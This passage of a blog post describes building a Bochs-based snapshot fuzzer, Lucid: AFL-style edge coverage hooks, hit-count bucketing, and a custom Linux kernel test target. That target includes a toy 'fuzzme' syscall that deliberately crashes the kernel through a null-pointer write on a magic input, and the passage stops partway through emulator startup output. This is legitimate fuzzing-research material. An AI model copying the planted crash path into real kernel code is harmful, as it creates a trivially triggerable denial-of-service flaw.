<p>After snapshots were settled, I moved on to implementing code coverage feedback. At first I was kind of paralyzed by the options since we have access to everything via Bochs. We know every single PC that is executed during a fuzzing iteration so really we can do whatever we want. I ended up implementing something pretty close to what old-school AFL did which tracks code coverage at two levels:</p>
<ul>
  <li>Edge pairs: These are addresses where a branch takes place. For example if the instruction at <code class="language-plaintext highlighter-rouge">0x1337</code> is a <code class="language-plaintext highlighter-rouge">jmp 0x13371337</code>, then we would have an edge pair of <code class="language-plaintext highlighter-rouge">0x1337</code> and <code class="language-plaintext highlighter-rouge">0x13371337</code>. This combination is what we’re keeping track of. Basically what is the current PC and what PC are we branching to. This also applies when we don’t take a branch, because we skip over the branching instruction and land on a new instruction instead which in its own way is a branch.</li>
  <li>Edge pair frequency: We also want to know how often these edge-pairs are accessed during a fuzzing iteration. So not only binary fidelity of “edge pair seen/edge pair not seen”, we also want frequency. We want to differentiate inputs that hit the edge pair 100x vs one that hits it 100000x during a fuzzing iteration. This added fidelity should provide us more valuable feedback vs. just rough data of edges hit vs not hit.</li>
</ul>

<p>With these two levels of introspection in mind, we had to choose a way to implement this. Luckily, we can compile Bochs with instrumentation that it exposes stubs for in <code class="language-plaintext highlighter-rouge">instrument/stubs/instrument.cc</code>. And some of the stubs are particularly useful for us because they instrument branching instructions. So if you compile Bochs with <code class="language-plaintext highlighter-rouge">BX_INSTRUMENTATION</code> defined, you get those stubs compiled into the instruction handlers that handle branching instructions in the guest. They have a prototype that logs the current PC and the destination PC. I had to make some changes to the stub signature for the conditional branch not taken instrumentation because it did not track what PC would be taken and we need that information to form our edge-pair. Here is what the stub logic looked like before, and then after I modified it:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{}</span>
<span class="kt">void</span> <span class="n">bx_instr_cnear_branch_not_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">)</span> <span class="p">{}</span>
</code></pre></div></div>

<p>And I changed them to:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{}</span>
<span class="kt">void</span> <span class="n">bx_instr_cnear_branch_not_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{}</span>
</code></pre></div></div>

<p>So I had to go through and change all the macro invocations in the instruction handlers to calculate a new <code class="language-plaintext highlighter-rouge">taken</code> PC for <code class="language-plaintext highlighter-rouge">bx_instr_cnear_branch_not_taken</code>, which was annoying but as far as hacking on someone else’s project goes, very easy. Here is an example from the Bochs patch file of what I changed at the call-site, you can see that I had to calculate a new variable <code class="language-plaintext highlighter-rouge">bx_address taken</code> in order to get a pair:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP);
+  bx_address taken = PREV_RIP + i-&gt;ilen();
+  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP, taken);
</code></pre></div></div>

<p>Now we know the current PC and the PC we’re branching to in the target each time, its time to put that information to use. On the Lucid side in Rust, I have a coverage map implementation like this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="n">COVERAGE_MAP_SIZE</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">65536</span><span class="p">;</span>

<span class="nd">#[derive(Clone)]</span>
<span class="nd">#[repr(C)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">CoverageMap</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">curr_map</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span>          <span class="c1">// The hit count map updated by Bochs</span>
    <span class="n">history_map</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span>           <span class="c1">// The map from the previous run</span>
    <span class="n">curr_map_addr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>       <span class="c1">// Address of the curr_map used by Bochs</span>
<span class="p">}</span>
</code></pre></div></div>

<p>It’s a long array of <code class="language-plaintext highlighter-rouge">u8</code> values where each index represents an edge-pair that we’ve hit. We pass the address of that array to Bochs so that it can set the value in the array for the edge-pair it’s currently tracking. So Bochs will encounter a branching instruction, it will have a current PC and a PC its branching to, it’ll formulate a meaningful value for it and translate that value into an index in the coverage map array of <code class="language-plaintext highlighter-rouge">u8</code> values. At that index, it will increment the <code class="language-plaintext highlighter-rouge">u8</code> value. This process is done by hashing the two edge addresses and then doing a logical AND operation so that we mask off the bits that wouldn’t be an index value in the coverage map. This means we could have collisions, we may have an edge-pair that yields the same hash as a second distinct edge-pair. But this is just a drawback associated with this strategy that we’ll have to accept. There are other ways of having non-colliding edge-pair tracking but it would require hash-lookups each time we encounter a branching instruction. This <em>may</em> be expensive, but given that we have such a slow emulator running our target code, we may eventually switch to this paradigm, we’ll see.</p>

<p>For the hashing algorithm I chose to use <code class="language-plaintext highlighter-rouge">dbj2_hash</code> which is a weird little hashing algorithm that is fast and supposedly offers some pretty good distribution (low collision rate). So all in all we do the following:</p>
<ol>
  <li>Encounter an edge-pair via an instrumented branching instruction</li>
  <li>Hash the two edge addresses using <code class="language-plaintext highlighter-rouge">dbj2_hash</code></li>
  <li>Shorten the hash value so that it cannot be longer than <code class="language-plaintext highlighter-rouge">coverage_map.len()</code></li>
  <li>Increase the <code class="language-plaintext highlighter-rouge">u8</code> value at <code class="language-plaintext highlighter-rouge">coverage_map[hash]</code></li>
</ol>

<p>This is how we update the map from Bochs:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">uint32_t</span> <span class="nf">dbj2_hash</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">src</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">dst</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="kt">uint32_t</span> <span class="n">hash</span> <span class="o">=</span> <span class="mi">5381</span><span class="p">;</span>
    <span class="n">hash</span> <span class="o">=</span> <span class="p">((</span><span class="n">hash</span> <span class="o">&lt;&lt;</span> <span class="mi">5</span><span class="p">)</span> <span class="o">+</span> <span class="n">hash</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="kt">uint32_t</span><span class="p">)(</span><span class="n">src</span><span class="p">);</span>
    <span class="n">hash</span> <span class="o">=</span> <span class="p">((</span><span class="n">hash</span> <span class="o">&lt;&lt;</span> <span class="mi">5</span><span class="p">)</span> <span class="o">+</span> <span class="n">hash</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="kt">uint32_t</span><span class="p">)(</span><span class="n">dst</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">hash</span> <span class="o">&amp;</span> <span class="p">(</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">coverage_map_size</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">update_coverage_map</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">hash</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Get the address of the coverage map</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">map_addr</span> <span class="o">=</span> <span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">coverage_map_addr</span><span class="p">;</span>

    <span class="c1">// Mark this as hit</span>
    <span class="n">map_addr</span><span class="p">[</span><span class="n">hash</span><span class="p">]</span><span class="o">++</span><span class="p">;</span>

    <span class="c1">// If it's been rolled-over to zero, make it one</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">map_addr</span><span class="p">[</span><span class="n">hash</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">map_addr</span><span class="p">[</span><span class="n">hash</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">hash</span> <span class="o">=</span> <span class="n">dbj2_hash</span><span class="p">(</span><span class="n">branch_eip</span><span class="p">,</span> <span class="n">new_eip</span><span class="p">);</span>
    <span class="n">update_coverage_map</span><span class="p">(</span><span class="n">hash</span><span class="p">);</span>
    <span class="c1">//printf("CNEAR TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">bx_instr_cnear_branch_not_taken</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">cpu</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">branch_eip</span><span class="p">,</span> <span class="n">bx_address</span> <span class="n">new_eip</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">hash</span> <span class="o">=</span> <span class="n">dbj2_hash</span><span class="p">(</span><span class="n">branch_eip</span><span class="p">,</span> <span class="n">new_eip</span><span class="p">);</span>
    <span class="n">update_coverage_map</span><span class="p">(</span><span class="n">hash</span><span class="p">);</span>
    <span class="c1">//printf("CNEAR NOT TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we have this array of <code class="language-plaintext highlighter-rouge">u8</code> values on the Lucid side to evaluate after each fuzzing iteration. On the Lucid side we need to do a few things:</p>
<ol>
  <li>We need to categorize each <code class="language-plaintext highlighter-rouge">u8</code> into what’s called a <code class="language-plaintext highlighter-rouge">bucket</code>, which is just a range of hits for the edge-pair. For example, hitting the edge-pair 100 times is not much different from hitting the same edge-pair 101 times, so we logically <code class="language-plaintext highlighter-rouge">bucket</code> those two types of coverage data together. They are the same as far as we’re concerned. What we really want are drastic differences. So if we see an edge-pair 1 time vs 1000 times, we want to know that difference. I stole the bucketing logic straight from AFL++ which has empirically tested the best bucketing strategies to get the most valuable feedback for most targets.</li>
  <li>After we transform the raw hit counts to bucket values instead, we’ll want to see if we see any new bucket counts that we haven’t seen before. This means we’ll need to keep a <em>copy</em> of the coverage map around at all times as well. We will walk both of them together. If the current coverage map now has a higher <code class="language-plaintext highlighter-rouge">u8</code> value for an edge-pair than the old coverage map (historical one that tracks all time highs for each index), then we have new coverage results we’re interested in!</li>
</ol>

<p>You can see that logic here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// Roughly sort ranges of hitcounts into buckets, based on AFL++ logic</span>
    <span class="nd">#[inline(always)]</span>
    <span class="k">fn</span> <span class="nf">bucket</span><span class="p">(</span><span class="n">hitcount</span><span class="p">:</span> <span class="nb">u8</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u8</span> <span class="p">{</span>
        <span class="k">match</span> <span class="n">hitcount</span> <span class="p">{</span>
            <span class="mi">0</span> <span class="k">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
            <span class="mi">1</span> <span class="k">=&gt;</span> <span class="mi">1</span><span class="p">,</span>
            <span class="mi">2</span> <span class="k">=&gt;</span> <span class="mi">2</span><span class="p">,</span>
            <span class="mi">3</span> <span class="k">=&gt;</span> <span class="mi">4</span><span class="p">,</span>
            <span class="mi">4</span><span class="o">..=</span><span class="mi">7</span> <span class="k">=&gt;</span> <span class="mi">8</span><span class="p">,</span>
            <span class="mi">8</span><span class="o">..=</span><span class="mi">15</span> <span class="k">=&gt;</span> <span class="mi">16</span><span class="p">,</span>
            <span class="mi">16</span><span class="o">..=</span><span class="mi">31</span> <span class="k">=&gt;</span> <span class="mi">32</span><span class="p">,</span>
            <span class="mi">32</span><span class="o">..=</span><span class="mi">127</span> <span class="k">=&gt;</span> <span class="mi">64</span><span class="p">,</span>
            <span class="mi">128</span><span class="o">..=</span><span class="mi">255</span> <span class="k">=&gt;</span> <span class="mi">128</span><span class="p">,</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Walk the coverage map in tandem with the history map looking for new</span>
    <span class="c1">// bucket thresholds for hitcounts or brand new coverage</span>
    <span class="c1">//    </span>
    <span class="c1">// Note: normally I like to write things as naively as possible, but we're</span>
    <span class="c1">// using chained iterator BS because the compiler spits out faster code</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">update</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="p">(</span><span class="nb">bool</span><span class="p">,</span> <span class="nb">usize</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">new_coverage</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">edge_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

        <span class="c1">// Iterate over the current map that was updated by Bochs during fc</span>
        <span class="k">self</span><span class="py">.curr_map</span><span class="nf">.iter_mut</span><span class="p">()</span>                         

            <span class="c1">// Use zip to add history map to the iterator, now we get tuple back</span>
            <span class="nf">.zip</span><span class="p">(</span><span class="k">self</span><span class="py">.history_map</span><span class="nf">.iter_mut</span><span class="p">())</span>

            <span class="c1">// For the tuple pair</span>
            <span class="nf">.for_each</span><span class="p">(|(</span><span class="n">curr</span><span class="p">,</span> <span class="n">hist</span><span class="p">)|</span> <span class="p">{</span>

                <span class="c1">// If we got a hitcount of at least 1</span>
                <span class="k">if</span> <span class="o">*</span><span class="n">curr</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>

                    <span class="c1">// Convert hitcount into bucket count</span>
                    <span class="k">let</span> <span class="n">bucket</span> <span class="o">=</span> <span class="nn">CoverageMap</span><span class="p">::</span><span class="nf">bucket</span><span class="p">(</span><span class="o">*</span><span class="n">curr</span><span class="p">);</span>

                    <span class="c1">// If the old record for this edge pair is lower, update</span>
                    <span class="k">if</span> <span class="o">*</span><span class="n">hist</span> <span class="o">&lt;</span> <span class="n">bucket</span> <span class="p">{</span>
                        <span class="o">*</span><span class="n">hist</span> <span class="o">=</span> <span class="n">bucket</span><span class="p">;</span>
                        <span class="n">new_coverage</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
                    <span class="p">}</span>

                    <span class="c1">// Zero out the current map for next fuzzing iteration</span>
                    <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">});</span>

        <span class="c1">// If we have new coverage, take the time to walk the map again and </span>
        <span class="c1">// count the number of edges we've hit</span>
        <span class="k">if</span> <span class="n">new_coverage</span> <span class="p">{</span>
            <span class="k">self</span><span class="py">.history_map</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.for_each</span><span class="p">(|</span><span class="o">&amp;</span><span class="n">hist</span><span class="p">|</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">hist</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
                    <span class="n">edge_count</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">});</span>
        <span class="p">}</span> 

        <span class="p">(</span><span class="n">new_coverage</span><span class="p">,</span> <span class="n">edge_count</span><span class="p">)</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>That’s pretty much it for code coverage feedback, Bochs updates the map from instrumentation hooks in branching instruction handlers, and then Lucid analyzes the results at the end of a fuzzing iteration and clears the map for the next run. Stolen directly from the AFL universe.</p>

<h1 id="environmenttarget-setup">Environment/Target Setup</h1>
<p>Getting a target setup for a full-system snapshot fuzzer is always going to be a pain. It is going to be so specific to your needs and having a generic way to do this type of thing does not exist. It’s essentially the problem of harnessing which remains unsolved generically. This is where all of the labor is for the end-user of a fuzzer. This is also where all the fun is though, lobotimizing your target so that it can be fuzzed is some of the funnest hacking I’ve ever done.</p>

<p>For Lucid, we need something Bochs can understand. Turns out it can run and boot <code class="language-plaintext highlighter-rouge">iso</code> files pretty easily, and since I’m mostly interested in fuzzing Linux kernel stuff, I decided to make a custom kernel and compile it into an <code class="language-plaintext highlighter-rouge">iso</code> to fuzz with Lucid. This worked extremely well and was very easy once I got the hang of creating <code class="language-plaintext highlighter-rouge">iso</code> files. As for a mature workflow, I think with this type of thing specifically, I would try to do the following:</p>
<ul>
  <li>Iteratively develop your harness/setup in QEMU-system since its faster, more mature, easier to use etc</li>
  <li>Once completely done with your harness/setup, compile that setup to an <code class="language-plaintext highlighter-rouge">.iso</code> and run it in Lucid for fuzzing</li>
</ul>

<p>That’s at least what I’ll be doing for Linux kernel stuff.</p>

<p>I developed a fun little toy syscall to fuzz as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Crash the kernel</span>
<span class="kt">void</span> <span class="nf">__crash</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %sp, %sp"</span><span class="p">);</span>
	<span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="mi">0</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Check to see if the input matches our criteria</span>
<span class="kt">void</span> <span class="nf">inspect_input</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">data_len</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Make sure we have enough data</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">)</span>
		<span class="k">return</span><span class="p">;</span>
	
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'f'</span><span class="p">)</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'u'</span><span class="p">)</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'z'</span><span class="p">)</span>
				<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'z'</span><span class="p">)</span>
					<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'m'</span><span class="p">)</span>
						<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'e'</span><span class="p">)</span>
							<span class="n">__crash</span><span class="p">();</span>

	<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">fuzzme</span><span class="p">,</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">data_len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">char</span> <span class="n">kernel_copy</span><span class="p">[</span><span class="mi">1024</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside fuzzme syscall</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="c1">// Make sure we don't overflow stack buffer</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&gt;</span> <span class="mi">1024</span><span class="p">)</span>
		<span class="n">data_len</span> <span class="o">=</span> <span class="mi">1024</span><span class="p">;</span>

	<span class="c1">// Copy the user data over</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">kernel_copy</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">data_len</span><span class="p">))</span>
	<span class="p">{</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Inspect contents to try and crash</span>
	<span class="n">inspect_input</span><span class="p">(</span><span class="n">kernel_copy</span><span class="p">,</span> <span class="n">data_len</span><span class="p">);</span>
	
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I just added a new syscall to the kernel called <code class="language-plaintext highlighter-rouge">fuzzme</code> that has a syscall number of <code class="language-plaintext highlighter-rouge">451</code> and then I just compile a harness and stuff that in <code class="language-plaintext highlighter-rouge">/usr/bin/harness</code> on the disk of the <code class="language-plaintext highlighter-rouge">iso</code>. I didn’t try to generically find a way to plumb up crashes to Lucid yet, I just put the special NOP instruction for signaling a crash instead in the <code class="language-plaintext highlighter-rouge">__crash</code> function. But with things like KASAN, I’m sure there will be some chokepoint I can use in the future as a catch all for crashes. Weirdly detecting crashes is not a trivial problem from the Bochs host level like it is when the kernel sends your program a signal (obviously some kernel oops will signal your harness if you build it this way).</p>

<p>The harness was simple and was just the following:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span>
<span class="cp">#define __NR_fuzzme 451
</span>
<span class="cp">#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }
</span>
<span class="cp">#define MAX_INPUT_SIZE 1024UL
</span>
<span class="k">struct</span> <span class="n">fuzz_input</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">signature</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
    <span class="kt">size_t</span> <span class="n">input_len</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="n">MAX_INPUT_SIZE</span><span class="p">];</span>
<span class="p">};</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">fuzz_input</span> <span class="n">fi</span> <span class="o">=</span> <span class="p">{</span> 
        <span class="p">.</span><span class="n">signature</span> <span class="o">=</span> <span class="n">LUCID_SIGNATURE</span><span class="p">,</span>
        <span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">8</span><span class="p">,</span>
    <span class="p">};</span>
    <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">fi</span><span class="p">.</span><span class="n">input</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sc">'A'</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>

    <span class="c1">// Create snapshot</span>
    <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

    <span class="c1">// Call syscall we're fuzzing</span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">__NR_fuzzme</span><span class="p">,</span> <span class="n">fi</span><span class="p">.</span><span class="n">input</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">fi</span><span class="p">.</span><span class="n">input_len</span><span class="p">);</span>

    <span class="c1">// Restore snapshot</span>
    <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"Syscall failed"</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Syscall success</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I create a 128-bit signature value that Lucid can scan for in Bochs heap memory and learn the dimensions of the fuzzing input. Once I find the signature, I can insert inputs into Bochs from Lucid. This is also probably doable by using some Bochs logic to translate guest linear addresses to the physical memory in the host Bochs and then plumb those values up via GPR during the snapshot, but I haven’t done a lot of work there yet. This way also seems pretty generic? I’m not sure what people will prefer, we’ll see.</p>

<p>You can see the special NOP instructions for taking a snapshot and then restoring a snapshot. So we really only fuzz the <code class="language-plaintext highlighter-rouge">syscall</code> portion of the harness.</p>

<p>I basically followed this tutorial for building an <code class="language-plaintext highlighter-rouge">iso</code> with BusyBox: https://medium.com/@ThyCrow/compiling-the-linux-kernel-and-creating-a-bootable-iso-from-it-6afb8d23ba22. I compiled the harness statically and then copied that into <code class="language-plaintext highlighter-rouge">/usr/bin/harness</code> and then I can run that from vanilla Bochs with a GUI to save Bochs state to disk at the snapshot point we want to fuzz from.</p>

<p>I added my custom syscall to the Linux kernel at <code class="language-plaintext highlighter-rouge">kernel/sys.c</code> at the bottom of the source file for kernel version <code class="language-plaintext highlighter-rouge">6.0.1</code>, and I added the harness to <code class="language-plaintext highlighter-rouge">/usr/bin/harness</code> in the <code class="language-plaintext highlighter-rouge">initramfs</code> from the tutorial. My file hierarchy for the <code class="language-plaintext highlighter-rouge">iso</code> when I went to create it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iso_files
  - boot
    - bzImage
    - initramfs.cpio.gz
    - grub
      - grub.cfg
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">bzImage</code> is the compiled kernel image. <code class="language-plaintext highlighter-rouge">initramfs.cpio.gz</code> is the compressed <code class="language-plaintext highlighter-rouge">initramfs</code> file system we want in the virtual machine, you can create that by navigating to its root and doing something like <code class="language-plaintext highlighter-rouge">find . | cpio -o -H newc | gzip &gt; /path/to/iso_files/boot/initramfs.cpio.gz</code>.</p>

<p>The contents of my <code class="language-plaintext highlighter-rouge">grub.cfg</code> file looked like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set default=0
set timeout=10
menuentry 'Lucid Linux' --class os {
    insmod gzio
    insmod part_msdos
    linux /boot/bzImage
    initrd /boot/initramfs.cpio.gz
}
</code></pre></div></div>

<p>Pointing <code class="language-plaintext highlighter-rouge">grub-mkrescue</code> at the <code class="language-plaintext highlighter-rouge">iso_files</code> dir will have it spit out the <code class="language-plaintext highlighter-rouge">iso</code> we want to run in Bochs: <code class="language-plaintext highlighter-rouge">grub-mkrescue -o lucid_linux.iso iso_files/</code>.</p>

<p>Here is what everything looks like from start to finish when you run the environment:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">devbox:~/git_bochs/Bochs/bochs]$</span><span class="w"> </span>/tmp/gui_bochs <span class="nt">-f</span> bochsrc_gui.txt
<span class="go">========================================================================
                     Bochs x86 Emulator 2.8.devel
             Built from GitHub snapshot after release 2.8
                  Compiled on Jun 21 2024 at 14:42:29
========================================================================
00000000000i[      ] BXSHARE not set. using compile time default '/usr/local/share/bochs'
00000000000i[      ] reading configuration from bochsrc_gui.txt
------------------------------
Bochs Configuration: Main Menu
------------------------------

This is the Bochs Configuration Interface, where you can describe the
machine that you want to simulate.  Bochs has already searched for a
configuration file (typically called bochsrc.txt) and loaded it if it
could be found.  When you are satisfied with the configuration, go
ahead and start the simulation.

You can also start bochs with the -q option to skip these menus.

1. Restore factory default configuration
2. Read options from...
3. Edit options
4. Save options to...
